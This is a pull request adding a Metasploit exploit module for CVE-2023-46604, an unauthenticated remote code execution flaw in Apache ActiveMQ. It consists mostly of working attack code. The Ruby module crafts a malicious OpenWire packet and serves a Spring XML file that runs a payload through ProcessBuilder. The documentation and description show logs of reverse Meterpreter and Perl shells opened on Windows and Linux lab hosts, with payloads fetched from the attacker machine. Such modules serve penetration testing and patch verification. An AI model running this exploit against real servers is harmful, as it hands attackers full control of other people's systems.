### PR TITLE
Exploit module for CVE-2023-46604 - Apache ActiveMQ

### DIFF
--- a/documentation/modules/exploit/multi/misc/apache_activemq_rce_cve_2023_46604.md
+++ b/documentation/modules/exploit/multi/misc/apache_activemq_rce_cve_2023_46604.md
@@ -1,0 +1,287 @@
+## Vulnerable Application
+This module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache ActiveMQ.
+Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to 5.16.6, and all
+versions before 5.15.16.
+
+For a full technical analysis of the vulnerability read the
+[Rapid7 AttackerKB Analysis](https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis).
+
+## Testing
+
+### Linux
+* The official [Getting Started](https://activemq.apache.org/getting-started) documentation has a full walkthrough.
+* You will need to install Java if you have not already done so.
+* Download a vulnerable version of ActiveMQ, e.g. [apache-activemq-5.18.3-bin.tar.gz](https://www.apache.org/dyn/closer.cgi?filename=/activemq/5.18.3/apache-activemq-5.18.3-bin.tar.gz&action=download)
+* Extract the contents: `tar zxvf apache-activemq-5.18.2-bin.tar.gz`
+* Change into the ActiveMQ directory: `cd apache-activemq-5.18.2/`
+* Run ActiveMQ in the foreground: `./activemq console`
+
+## Verification Steps
+Note: Disable Defender if you are using the default payloads on a Windows target.
+
+Steps:
+1. Start msfconsole
+2. `use exploit/multi/misc/apache_activemq_rce_cve_2023_46604`
+3. `set RHOST 192.168.86.50`
+4. `set SRVHOST eth0`
+5. `set target 0`
+6. `set PAYLOAD cmd/windows/http/x64/meterpreter/reverse_tcp`
+7. `check`
+8. `exploit`
+
+## Scenarios
+
+### Windows
+```
+msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > show options
+
+Module options (exploit/multi/misc/apache_activemq_rce_cve_2023_46604):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   CHOST                     no        The local client address
+   CPORT                     no        The local client port
+   Proxies                   no        A proxy chain of format type:host:port[
+                                       ,type:host:port][...]
+   RHOSTS   192.168.86.50    yes       The target host(s), see https://docs.me
+                                       tasploit.com/docs/using-metasploit/basi
+                                       cs/using-metasploit.html
+   RPORT    61616            yes       The target port (TCP)
+   SRVHOST  192.168.86.42    yes       The local host or network interface to
+                                       listen on. This must be an address on t
+                                       he local machine or 0.0.0.0 to listen o
+                                       n all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSLCert                   no        Path to a custom SSL certificate (defau
+                                       lt is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (defaul
+                                       t is random)
+
+
+Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   EXITFUNC           process          yes       Exit technique (Accepted: '',
+                                                  seh, thread, process, none)
+   FETCH_COMMAND      CERTUTIL         yes       Command to fetch payload (Acc
+                                                 epted: CURL, TFTP, CERTUTIL)
+   FETCH_DELETE       false            yes       Attempt to delete the binary
+                                                 after execution
+   FETCH_FILENAME     ainzysikAU       no        Name to use on remote system
+                                                 when storing payload; cannot
+                                                 contain spaces.
+   FETCH_SRVHOST                       no        Local IP to use for serving p
+                                                 ayload
+   FETCH_SRVPORT      8080             yes       Local port to use for serving
+                                                  payload
+   FETCH_URIPATH                       no        Local URI to use for serving
+                                                 payload
+   FETCH_WRITABLE_DI  %TEMP%           yes       Remote writable dir to store
+   R                                             payload; cannot contain space
+                                                 s.
+   LHOST              192.168.86.42    yes       The listen address (an interf
+                                                 ace may be specified)
+   LPORT              4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > check
+[*] 192.168.86.50:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.3
+msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] 192.168.86.50:61616 - Running automatic check ("set AutoCheck false" to disable)
+[+] 192.168.86.50:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.3
+[*] 192.168.86.50:61616 - Using URL: http://192.168.86.42:8080/4ORmILKzvCrowHQ
+[*] 192.168.86.50:61616 - Sent ClassPathXmlApplicationContext configuration file.
+[*] 192.168.86.50:61616 - Sent ClassPathXmlApplicationContext configuration file.
+[*] Sending stage (200774 bytes) to 192.168.86.50
+[*] Meterpreter session 2 opened (192.168.86.42:4444 -> 192.168.86.50:51975) at 2023-11-02 10:15:14 +0000
+
+meterpreter > getuid
+Server username: WIN-V28QNSO2H05\Administrator
+meterpreter > pwd
+C:\apache-activemq-5.15.3\bin
+meterpreter > sysinfo
+Computer        : WIN-V28QNSO2H05
+OS              : Windows 2016+ (10.0 Build 20348).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > 
+```
+
+### Linux
+
+```
+msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > show options
+
+Module options (exploit/multi/misc/apache_activemq_rce_cve_2023_46604):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   CHOST                     no        The local client address
+   CPORT                     no        The local client port
+   Proxies                   no        A proxy chain of format type:host:port[
+                                       ,type:host:port][...]
+   RHOSTS   192.168.86.43    yes       The target host(s), see https://docs.me
+                                       tasploit.com/docs/using-metasploit/basi
+                                       cs/using-metasploit.html
+   RPORT    61616            yes       The target port (TCP)
+   SRVHOST  192.168.86.42    yes       The local host or network interface to
+                                       listen on. This must be an address on t
+                                       he local machine or 0.0.0.0 to listen o
+                                       n all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSLCert                   no        Path to a custom SSL certificate (defau
+                                       lt is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (defaul
+                                       t is random)
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   FETCH_COMMAND      CURL             yes       Command to fetch payload (Acc
+                                                 epted: CURL, FTP, TFTP, TNFTP
+                                                 , WGET)
+   FETCH_DELETE       false            yes       Attempt to delete the binary
+                                                 after execution
+   FETCH_FILENAME     baCcDlijxJN      no        Name to use on remote system
+                                                 when storing payload; cannot
+                                                 contain spaces.
+   FETCH_SRVHOST                       no        Local IP to use for serving p
+                                                 ayload
+   FETCH_SRVPORT      8080             yes       Local port to use for serving
+                                                  payload
+   FETCH_URIPATH                       no        Local URI to use for serving
+                                                 payload
+   FETCH_WRITABLE_DI                   yes       Remote writable dir to store
+   R                                             payload; cannot contain space
+                                                 s.
+   LHOST              192.168.86.42    yes       The listen address (an interf
+                                                 ace may be specified)
+   LPORT              4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > check
+[*] 192.168.86.43:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
+msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] 192.168.86.43:61616 - Running automatic check ("set AutoCheck false" to disable)
+[+] 192.168.86.43:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
+[*] 192.168.86.43:61616 - Using URL: http://192.168.86.42:8080/Fn51CApi
+[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
+[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
+[*] Sending stage (3045380 bytes) to 192.168.86.43
+[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.43:44674) at 2023-11-02 10:17:42 +0000
+
+meterpreter > getuid
+Server username: steve
+meterpreter > pwd
+/home/steve/Downloads/apache-activemq-5.18.2/bin
+meterpreter > sysinfo
+Computer     : 192.168.86.43
+OS           : Ubuntu 22.04 (Linux 6.2.0-33-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.86.43 - Meterpreter session 3 closed.  Reason: Died
+msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > 
+```
+
+### Unix
+
+```
+msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > show options
+
+Module options (exploit/multi/misc/apache_activemq_rce_cve_2023_46604):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   CHOST                     no        The local client address
+   CPORT                     no        The local client port
+   Proxies                   no        A proxy chain of format type:host:port[
+                                       ,type:host:port][...]
+   RHOSTS   192.168.86.43    yes       The target host(s), see https://docs.me
+                                       tasploit.com/docs/using-metasploit/basi
+                                       cs/using-metasploit.html
+   RPORT    61616            yes       The target port (TCP)
+   SRVHOST  192.168.86.42    yes       The local host or network interface to
+                                       listen on. This must be an address on t
+                                       he local machine or 0.0.0.0 to listen o
+                                       n all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSLCert                   no        Path to a custom SSL certificate (defau
+                                       lt is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (defaul
+                                       t is random)
+
+
+Payload options (cmd/unix/reverse_perl):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.86.42    yes       The listen address (an interface may be s
+                                     pecified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   Unix
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > check
+[*] 192.168.86.43:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
+msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] 192.168.86.43:61616 - Running automatic check ("set AutoCheck false" to disable)
+[+] 192.168.86.43:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
+[*] 192.168.86.43:61616 - Using URL: http://192.168.86.42:8080/3mzi3Tfryin
+[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
+[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
+[*] Command shell session 4 opened (192.168.86.42:4444 -> 192.168.86.43:48962) at 2023-11-02 10:20:13 +0000
+id
+[*] 192.168.86.43:61616 - Server stopped.
+
+uid=1000(steve) gid=1000(steve) groups=1000(steve),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),139(wireshark)
+pwd
+/home/steve/Downloads/apache-activemq-5.18.2/bin
+uname -a
+Linux sfewer-ubuntu-test 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep  7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
+exit
+```

--- a/documentation/modules/exploit/multi/misc/apache_activemq_rce_cve_2023_46604.md
+++ b/documentation/modules/exploit/multi/misc/apache_activemq_rce_cve_2023_46604.md
@@ -13,7 +13,7 @@ For a full technical analysis of the vulnerability read the
 * You will need to install Java if you have not already done so.
 * Download a vulnerable version of ActiveMQ, e.g. [apache-activemq-5.18.2-bin.tar.gz](https://www.apache.org/dyn/closer.cgi?filename=/activemq/5.18.2/apache-activemq-5.18.2-bin.tar.gz&action=download)
 * Extract the contents: `tar zxvf apache-activemq-5.18.2-bin.tar.gz`
-* Change into the ActiveMQ directory: `cd apache-activemq-5.18.2/`
+* Change into the ActiveMQ directory: `cd apache-activemq-5.18.2/bin/`
 * Run ActiveMQ in the foreground: `./activemq console`
 
 ## Verification Steps

--- a/documentation/modules/exploit/multi/misc/apache_activemq_rce_cve_2023_46604.md
+++ b/documentation/modules/exploit/multi/misc/apache_activemq_rce_cve_2023_46604.md
@@ -19,13 +19,13 @@ For a full technical analysis of the vulnerability read the
 ## Verification Steps
 Note: Disable Defender if you are using the default payloads on a Windows target.
 
-Steps:
+Steps (Linux target):
 1. Start msfconsole
 2. `use exploit/multi/misc/apache_activemq_rce_cve_2023_46604`
-3. `set RHOST 192.168.86.50`
+3. `set RHOST <LINUX_TARGET_IP>`
 4. `set SRVHOST eth0`
-5. `set target 0`
-6. `set PAYLOAD cmd/windows/http/x64/meterpreter/reverse_tcp`
+5. `set target 1`
+6. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
 7. `check`
 8. `exploit`
 

--- a/documentation/modules/exploit/multi/misc/apache_activemq_rce_cve_2023_46604.md
+++ b/documentation/modules/exploit/multi/misc/apache_activemq_rce_cve_2023_46604.md
@@ -11,7 +11,7 @@ For a full technical analysis of the vulnerability read the
 ### Linux
 * The official [Getting Started](https://activemq.apache.org/getting-started) documentation has a full walkthrough.
 * You will need to install Java if you have not already done so.
-* Download a vulnerable version of ActiveMQ, e.g. [apache-activemq-5.18.3-bin.tar.gz](https://www.apache.org/dyn/closer.cgi?filename=/activemq/5.18.3/apache-activemq-5.18.3-bin.tar.gz&action=download)
+* Download a vulnerable version of ActiveMQ, e.g. [apache-activemq-5.18.2-bin.tar.gz](https://www.apache.org/dyn/closer.cgi?filename=/activemq/5.18.2/apache-activemq-5.18.2-bin.tar.gz&action=download)
 * Extract the contents: `tar zxvf apache-activemq-5.18.2-bin.tar.gz`
 * Change into the ActiveMQ directory: `cd apache-activemq-5.18.2/`
 * Run ActiveMQ in the foreground: `./activemq console`

--- a/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
+++ b/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
@@ -111,7 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # The vulnerability allows us to instantiate an arbitrary class, with a single arbitrary string parameter. To
     # leverage this we can use ClassPathXmlApplicationContext, and pass a URL to an XML configuration file we
-    # serve. This XML file allow use to create arbitrary classes, and call arbitrary methods. This is leveraged to
+    # serve. This XML file allows us to create arbitrary classes, and call arbitrary methods. This is leveraged to
     # run an attacker supplied command line via java.lang.ProcessBuilder.start.
     clazz = 'org.springframework.context.support.ClassPathXmlApplicationContext'
 
@@ -121,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data << [0].pack('N')
     # and a 1 byte boolean for response required.
     data << [0].pack('C')
-    # ResponseMarshaller.looseUnmarshal read a 4 byte int for teh correlation ID.
+    # ResponseMarshaller.looseUnmarshal read a 4 byte int for the correlation ID.
     data << [0].pack('N')
     # BaseDataStreamMarshaller.looseUnmarsalThrowable wants a boolean true to continue to unmarshall.
     data << [1].pack('C')
@@ -129,9 +129,9 @@ class MetasploitModule < Msf::Exploit::Remote
     data << [1].pack('C')
     # First 2 bytes are the length.
     data << [clazz.length].pack('n')
-    # Then the string data.
+    # Then the string data. This is the class name to instantiate.
     data << clazz
-    # Same again for the method string.
+    # Same again for the method string. This is the single string parameter used during class instantiation.
     data << [1].pack('C')
     data << [get_uri.length].pack('n')
     data << get_uri

--- a/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
+++ b/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
@@ -92,27 +92,24 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return CheckCode::Unknown unless magic == 'ActiveMQ'
 
-    if res =~ /ProviderVersion...(\d+\.\d+\.\d+)/
+    return CheckCode::Detected unless res =~ /ProviderVersion...(\d+\.\d+\.\d+)/
 
-      version = Rex::Version.new(::Regexp.last_match(1))
+    version = Rex::Version.new(::Regexp.last_match(1))
 
-      ranges = [
-        ['5.18.0', '5.18.2'],
-        ['5.17.0', '5.17.5'],
-        ['5.16.0', '5.16.6'],
-        ['0.0.0', '5.15.15']
-      ]
+    ranges = [
+      ['5.18.0', '5.18.2'],
+      ['5.17.0', '5.17.5'],
+      ['5.16.0', '5.16.6'],
+      ['0.0.0', '5.15.15']
+    ]
 
-      ranges.each do |min, max|
-        if version.between?(Rex::Version.new(min), Rex::Version.new(max))
-          return Exploit::CheckCode::Appears("Apache ActiveMQ #{version}")
-        end
+    ranges.each do |min, max|
+      if version.between?(Rex::Version.new(min), Rex::Version.new(max))
+        return Exploit::CheckCode::Appears("Apache ActiveMQ #{version}")
       end
-
-      return Exploit::CheckCode::Safe("Apache ActiveMQ #{version}")
     end
 
-    CheckCode::Detected
+    Exploit::CheckCode::Safe("Apache ActiveMQ #{version}")
   end
 
   def exploit

--- a/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
+++ b/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
@@ -164,39 +164,39 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
-    if request.uri == get_resource
-      case target['Platform']
-      when 'win'
-        shell = 'cmd.exe'
-        flag = '/c'
-      when 'linux', 'unix'
-        shell = '/bin/sh'
-        flag = '-c'
-      end
-
-      xml = %(<?xml version="1.0" encoding="UTF-8"?>
-<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
-  <bean id="#{Rex::Text.rand_text_alpha(8)}" class="java.lang.ProcessBuilder" init-method="start">
-    <constructor-arg>
-      <list>
-        <value>#{shell}</value>
-        <value>#{flag}</value>
-        <value><![CDATA[#{payload.encoded}]]></value>
-      </list>
-    </constructor-arg>
-  </bean>
-</beans>)
-
-      send_response(cli, xml, {
-        'Content-Type' => 'application/xml',
-        'Connection' => 'close',
-        'Pragma' => 'no-cache'
-      })
-
-      print_status('Sent ClassPathXmlApplicationContext configuration file.')
-    else
+    if request.uri != get_resource
       super
     end
+
+    case target['Platform']
+    when 'win'
+      shell = 'cmd.exe'
+      flag = '/c'
+    when 'linux', 'unix'
+      shell = '/bin/sh'
+      flag = '-c'
+    end
+
+    xml = %(<?xml version="1.0" encoding="UTF-8"?>
+<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
+<bean id="#{Rex::Text.rand_text_alpha(8)}" class="java.lang.ProcessBuilder" init-method="start">
+  <constructor-arg>
+    <list>
+      <value>#{shell}</value>
+      <value>#{flag}</value>
+      <value><![CDATA[#{payload.encoded}]]></value>
+    </list>
+  </constructor-arg>
+</bean>
+</beans>)
+
+    send_response(cli, xml, {
+      'Content-Type' => 'application/xml',
+      'Connection' => 'close',
+      'Pragma' => 'no-cache'
+    })
+
+    print_status('Sent ClassPathXmlApplicationContext configuration file.')
   end
 
 end

--- a/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
+++ b/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
@@ -1,0 +1,186 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Retry
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache ActiveMQ Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache
+          ActiveMQ. Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to
+          5.16.6, and all versions before 5.15.16.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'X1r0z', # Original technical analysis & exploit
+          'sfewer-r7', # MSF exploit & Rapid7 analysis
+        ],
+        'References' => [
+          ['CVE', '2023-46604'],
+          ['URL', 'https://github.com/X1r0z/ActiveMQ-RCE'],
+          ['URL', 'https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/'],
+          ['URL', 'https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis'],
+          ['URL', 'https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt']
+        ],
+        'DisclosureDate' => '2023-10-27',
+        'Privileged' => false,
+        'Platform' => %w[win linux],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Windows',
+            {
+              'Platform' => 'win'
+            }
+          ],
+          [
+            'Linux',
+            {
+              'Platform' => 'linux'
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          # By default ActiveMQ listens for OpenWire requests on TCP port 61616.
+          'RPORT' => 61616,
+          'WfsDelay' => 30
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def check
+    connect
+
+    res = sock.get_once
+
+    disconnect
+
+    return CheckCode::Unknown unless res
+
+    len, _, magic = res.unpack('NCZ*')
+
+    return CheckCode::Unknown unless res.length == len + 4
+
+    return CheckCode::Unknown unless magic == 'ActiveMQ'
+
+    if res =~ /ProviderVersion...(\d+\.\d+\.\d+)/
+
+      version = Rex::Version.new(::Regexp.last_match(1))
+
+      ranges = [
+        ['5.18.0', '5.18.2'],
+        ['5.17.0', '5.17.5'],
+        ['5.16.0', '5.16.6'],
+        ['0.0.0', '5.15.15']
+      ]
+
+      ranges.each do |min, max|
+        if version.between?(Rex::Version.new(min), Rex::Version.new(max))
+          return Exploit::CheckCode::Appears("Apache ActiveMQ #{version}")
+        end
+      end
+
+      return Exploit::CheckCode::Safe("Apache ActiveMQ #{version}")
+    end
+
+    CheckCode::Detected
+  end
+
+  def exploit
+    start_service
+
+    connect
+
+    # The vulnerability allows us to instantiate an arbitrary class, with a single arbitrary string parameter. To
+    # leverage this we can use ClassPathXmlApplicationContext, and pass a URL to an XML configuration file we
+    # serve. This XML file allow use to create arbitrary classes, and call arbitrary methods. This is leveraged to
+    # run an attacker supplied command line via java.lang.ProcessBuilder.start.
+    clazz = 'org.springframework.context.support.ClassPathXmlApplicationContext'
+
+    # 31 is the EXCEPTION_RESPONSE data type.
+    data = [31].pack('C')
+    # ResponseMarshaller.looseUnmarshal reads a 4 byte int for the command id.
+    data << [0].pack('N')
+    # and a 1 byte boolean for response required.
+    data << [0].pack('C')
+    # ResponseMarshaller.looseUnmarshal read a 4 byte int for teh correlation ID.
+    data << [0].pack('N')
+    # BaseDataStreamMarshaller.looseUnmarsalThrowable wants a boolean true to continue to unmarshall.
+    data << [1].pack('C')
+    # BaseDataStreamMarshaller.looseUnmarshalString reads a byte boolean and if true, reads a UTF-8 string.
+    data << [1].pack('C')
+    # First 2 bytes are the length.
+    data << [clazz.length].pack('n')
+    # Then the string data.
+    data << clazz
+    # Same again for the method string.
+    data << [1].pack('C')
+    data << [get_uri.length].pack('n')
+    data << get_uri
+
+    sock.puts([data.length].pack('N') + data)
+
+    retry_until_truthy(timeout: datastore['WfsDelay']) do
+      !handler_enabled? || session_created?
+    end
+
+    handler
+  ensure
+    cleanup
+  end
+
+  def on_request_uri(cli, request)
+    if request.uri == get_resource
+      case target['Platform']
+      when 'win'
+        shell = 'cmd.exe'
+        flag = '/c'
+      when 'linux'
+        shell = '/bin/sh'
+        flag = '-c'
+      end
+
+      xml = %(<?xml version="1.0" encoding="UTF-8"?>
+<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
+  <bean id="#{Rex::Text.rand_text_alpha(8)}" class="java.lang.ProcessBuilder" init-method="start">
+    <constructor-arg>
+      <list>
+        <value>#{shell}</value>
+        <value>#{flag}</value>
+        <value><![CDATA[#{payload.encoded}]]></value>
+      </list>
+    </constructor-arg>
+  </bean>
+</beans>)
+
+      send_response(cli, xml, {
+        'Content-Type' => 'application/xml',
+        'Connection' => 'close',
+        'Pragma' => 'no-cache'
+      })
+
+      print_status('Sent ClassPathXmlApplicationContext configuration file.')
+    else
+      super
+    end
+  end
+
+end

--- a/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
+++ b/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
@@ -116,6 +116,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    # The payload is send in a CDATA section of an XML file. Therefore, the payload cannot contain a CDATA closing tag.
+    if payload.encoded.include? ']]>'
+      fail_with(Failure::BadConfig, 'The encoded payload data may not contain the CDATA closing tag ]]>')
+    end
+
     start_service
 
     connect

--- a/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
+++ b/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
@@ -37,6 +37,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'Privileged' => false,
         'Platform' => %w[win linux],
         'Arch' => [ARCH_CMD],
+        # The Msf::Exploit::Remote::HttpServer mixin will bring in Exploit::Remote::SocketServer, this will set the
+        # Stance to passive, which is unexpected and results in the exploit running as a background job, as RunAsJob will
+        # be set to true. To avoid this happening, we explicitly set the Stance to Aggressive.
+        'Stance' => Stance::Aggressive,
         'Targets' => [
           [
             'Windows',

--- a/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
+++ b/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2023-10-27',
         'Privileged' => false,
-        'Platform' => %w[win linux],
+        'Platform' => %w[win linux unix],
         'Arch' => [ARCH_CMD],
         # The Msf::Exploit::Remote::HttpServer mixin will bring in Exploit::Remote::SocketServer, this will set the
         # Stance to passive, which is unexpected and results in the exploit running as a background job, as RunAsJob will
@@ -53,12 +53,19 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'linux'
             }
+          ],
+          [
+            'Unix',
+            {
+              'Platform' => 'unix'
+            }
           ]
         ],
         'DefaultTarget' => 0,
         'DefaultOptions' => {
           # By default ActiveMQ listens for OpenWire requests on TCP port 61616.
           'RPORT' => 61616,
+          # The maximum time in seconds to wait for a session.
           'WfsDelay' => 30
         },
         'Notes' => {
@@ -157,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Remote
       when 'win'
         shell = 'cmd.exe'
         flag = '/c'
-      when 'linux'
+      when 'linux', 'unix'
         shell = '/bin/sh'
         flag = '-c'
       end


### PR DESCRIPTION
This pull request is an exploit module for CVE-2023-46604, affecting the OpenWire transport unmarshaller in Apache ActiveMQ. This exploit is based of this original work by X1r0z (https://github.com/X1r0z/ActiveMQ-RCE).

Opening this pull request as a draft while I work on it, the following needs to be done.
- [x] The session is not being automatically caught as expected, you have to manually interact with the new session
- [x] Test a Linux target
- [x] Add documentation

### Example usage: 
```
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > show options

Module options (exploit/multi/misc/apache_activemq_rce_cve_2023_46604):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[
                                       ,type:host:port][...]
   RHOSTS   192.168.86.50    yes       The target host(s), see https://docs.me
                                       tasploit.com/docs/using-metasploit/basi
                                       cs/using-metasploit.html
   RPORT    61616            yes       The target port (TCP)
   SRVHOST  192.168.86.42    yes       The local host or network interface to
                                       listen on. This must be an address on t
                                       he local machine or 0.0.0.0 to listen o
                                       n all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSLCert                   no        Path to a custom SSL certificate (defau
                                       lt is randomly generated)
   URIPATH                   no        The URI to use for this exploit (defaul
                                       t is random)


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   EXITFUNC           process          yes       Exit technique (Accepted: '',
                                                  seh, thread, process, none)
   FETCH_COMMAND      CERTUTIL         yes       Command to fetch payload (Acc
                                                 epted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE       false            yes       Attempt to delete the binary
                                                 after execution
   FETCH_FILENAME     HzZSYqDojV       no        Name to use on remote system
                                                 when storing payload; cannot
                                                 contain spaces.
   FETCH_SRVHOST                       no        Local IP to use for serving p
                                                 ayload
   FETCH_SRVPORT      8080             yes       Local port to use for serving
                                                  payload
   FETCH_URIPATH                       no        Local URI to use for serving
                                                 payload
   FETCH_WRITABLE_DI  %TEMP%           yes       Remote writable dir to store
   R                                             payload; cannot contain space
                                                 s.
   LHOST              eth0             yes       The listen address (an interf
                                                 ace may be specified)
   LPORT              4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > check
[*] 192.168.86.50:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.3
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > 
[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] 192.168.86.50:61616 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.86.50:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.3
[*] 192.168.86.50:61616 - Using URL: http://192.168.86.42:8080/33Y94vb
